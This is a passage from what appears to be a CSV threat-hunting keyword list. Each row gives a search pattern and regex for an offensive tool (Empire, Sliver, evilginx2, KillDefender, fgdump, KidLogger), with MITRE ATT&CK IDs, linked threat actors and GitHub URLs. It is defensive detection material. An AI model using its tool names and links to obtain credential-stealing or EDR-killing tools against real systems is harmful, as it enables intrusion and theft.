Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","50434" "*keystore2john.py*",".{0,1000}keystore2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50435" "*KeyTabExtract*",".{0,1000}KeyTabExtract.{0,1000}","offensive_tool_keyword","KeyTabExtract","KeyTabExtract is a little utility to help extract valuable information from 502 type .keytab files. which may be used to authenticate Linux boxes to Kerberos. The script will extract information such as the realm. Service Principal. Encryption Type and NTLM Hash","T1003 - T1552.004 - T1110 - T1210","TA0006 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/sosdave/KeyTabExtract","1","0","#linux","N/A","N/A","3","260","46","2020-08-26T01:03:37Z","2019-03-18T15:00:14Z","50436" "*keywa7/keywa7*",".{0,1000}keywa7\/keywa7.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","1","N/A","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","50437" "*keyword_obfuscation*",".{0,1000}keyword_obfuscation.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 
- T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","50438" "*kgretzky/evilginx2*",".{0,1000}kgretzky\/evilginx2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","50439" "*kgretzky/evilqr*",".{0,1000}kgretzky\/evilqr.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","N/A","3","292","45","2024-06-18T11:27:23Z","2023-06-20T12:58:09Z","50440" 
"*kgretzky/pwndrop*",".{0,1000}kgretzky\/pwndrop.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","50441" "*kh4sh3i/Spring-CVE*",".{0,1000}kh4sh3i\/Spring\-CVE.{0,1000}","offensive_tool_keyword","POC","POC exploit for CVE-2022-22963","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/kh4sh3i/Spring-CVE","1","1","N/A","N/A","N/A","1","14","7","2022-03-31T20:58:54Z","2022-03-31T20:19:51Z","50442" "*khast3x/h8mail*",".{0,1000}khast3x\/h8mail.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Reconnaissance","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","N/A","1","11","4","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z","50443" "*Kicking off download cradle in a new process*",".{0,1000}Kicking\soff\sdownload\scradle\sin\sa\snew\sprocess.{0,1000}","offensive_tool_keyword","empire","empire script command. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","50444" "*kick-operator -n *",".{0,1000}kick\-operator\s\-n\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","50445" "*KidLogger-*.dmg*",".{0,1000}KidLogger\-.{0,1000}\.dmg.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","#macos","N/A","10","10","N/A","N/A","N/A","N/A","50446" "*kidlogger.conf*",".{0,1000}kidlogger\.conf.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50447" "*Kidlogger.exe*",".{0,1000}Kidlogger\.exe.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50448" "*KidLogger.lnk*",".{0,1000}KidLogger\.lnk.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50449" "*KidLogger.net*",".{0,1000}KidLogger\.net.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50450" "*KidLogger.pif*",".{0,1000}KidLogger\.pif.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - 
TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50451" "*KidLogger.url*",".{0,1000}KidLogger\.url.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50452" "*kidlogger_install*",".{0,1000}kidlogger_install.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50453" "*kidlogger_user.exe*",".{0,1000}kidlogger_user\.exe.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50454" "*Kill CacheDump service (shouldn't be used)*",".{0,1000}Kill\sCacheDump\sservice\s\(shouldn\'t\sbe\sused\).{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#content","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","50455" "*killAllNimplants*",".{0,1000}killAllNimplants.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","50459" "*killdefender 
check*",".{0,1000}killdefender\scheck.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","N/A","10","10","66","15","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z","50460" "*killdefender kill*",".{0,1000}killdefender\skill.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","N/A","10","10","66","15","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z","50461" "*KillDefender.h*",".{0,1000}KillDefender\.h.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","N/A","10","3","224","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z","50462" "*KillDefender.x64*",".{0,1000}KillDefender\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50463" "*KillDefender.x64.*",".{0,1000}KillDefender\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","1","N/A","N/A","10","10","66","15","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z","50464" "*killdefender_bof*",".{0,1000}killdefender_bof.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50465" "*KillDefender_BOF*",".{0,1000}KillDefender_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - 
Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","1","N/A","N/A","10","10","66","15","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z","50466" "*KillDefenderBOF-main*",".{0,1000}KillDefenderBOF\-main.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","N/A","10","3","224","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z","50467" "*Killed running eventvwr*",".{0,1000}Killed\srunning\seventvwr.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-EventVwrBypass.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","50468" "*Killed running sdclt*",".{0,1000}Killed\srunning\ssdclt.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-SDCLTBypass.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","50469" "*Killer tool for EDR/AV Evasion --> IAT Obfuscation*",".{0,1000}Killer\stool\sfor\sEDR\/AV\sEvasion\s\-\-\>\sIAT\sObfuscation.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","50470" "*KillEvenlogService {*",".{0,1000}KillEvenlogService\s\{.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - 
T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","50471" "*kill-implant*",".{0,1000}kill\-implant.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - 